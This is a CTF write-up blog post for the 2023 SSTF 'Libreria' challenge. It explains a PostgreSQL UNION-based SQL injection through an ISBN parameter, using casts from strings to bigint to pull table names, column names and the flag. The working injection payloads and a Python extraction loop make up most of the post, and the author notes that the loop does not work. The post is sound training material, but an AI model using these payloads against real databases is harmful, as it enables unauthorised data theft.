CTF Writeup

2023 SSTF - Libreria

LittleDev0617 2023. 8. 21. 11:45

sql injection prob

we can ask to buy a book with ISBN.

In source code, they put ISBN directly into sql query.

We can get any info of database with UNION SELECT but we need to make isbn >= 10000000000.

here is my sqli query to get table.

23' UNION SELECT ('x' || encode(right(table_name, 8)::bytea, 'hex'))::bit(64)::bigint as isbn FROM (SELECT (row_number() over()) AS rownum, table_name FROM information_schema.tables) as tb WHERE rownum=1 --

First we need to get table name, column name, any information with integer because of isbn >= 1000000000 condition.
So I tried to convert string to int. This server use postgresql so I use this way;
8 bytes of string -> bytea -> hex encode -> bit(64) -> bigint

So with this query we can get table_name with setting rownum.

23' UNION SELECT ('x' || encode(right(table_name, 8)::bytea, 'hex'))::bit(64)::bigint as isbn FROM (SELECT (row_number() over()) AS rownum, table_name FROM information_schema.tables) as tb WHERE rownum=1 -- 

>>> bytes.fromhex(hex( 7236556099291081849)[2:])
b'dminonly'

yeah there are 'adminonly' table.

let's get column names of 'adminonly' table.

23' UNION SELECT ('x' || encode(left(column_name, 8)::bytea, 'hex'))::bit(64)::bigint as isbn FROM (SELECT (row_number() over()) AS rownum, column_name, table_name FROM information_schema.columns WHERE table_name='adminonly') as tb WHERE tb.rownum=1 --

changing rownum 1, 2, 3 and can get 'idx', 'key', 'value' columns.

To find flag we need to get value column of whole rows.

23' UNION SELECT ('x' || encode(substring(value, 1, 8)::bytea, 'hex'))::bit(64)::bigint as isbn FROM (SELECT value FROM adminonly WHERE idx=2) as tb --

In idx=2 flag appeared.

for i in range(1,10):
    r = get(url+f"23' UNION SELECT ('x' || encode(substring(value, {i*8}, 8)::bytea, 'hex'))::bit(64)::bigint as isbn FROM (SELECT value FROM adminonly WHERE idx=2) as tb -- ", timeout=5)
    print(r.history)
    print(bytes.fromhex(hex(r.text.split('book(')[1].split(')')[0])[2:]).decode(), end='')
# SCTF{SQL_i5_4_l4n9uage_t0_man4G3_d4ta_1n_Da7aba$e5}\x00\x00\x00\x00

above code doesn't work but it shows how to get whole flag.

'CTF Writeup' 카테고리의 다른 글

2023 Bauhinia CTF - Very Simplified RPG  (1) 2023.08.21
2023 SSTF - Dusty Code  (0) 2023.08.21
AmateursCTF 2023 - flagchecker Writeup  (0) 2023.07.19
zer0ptsCTF 2023 - decompile_me Writeup  (0) 2023.07.19
zer0ptsCTF 2023 - mimikyu Writeup  (0) 2023.07.19

'CTF Writeup'의 다른글

  • 현재글2023 SSTF - Libreria

관련글

댓글

티스토리툴바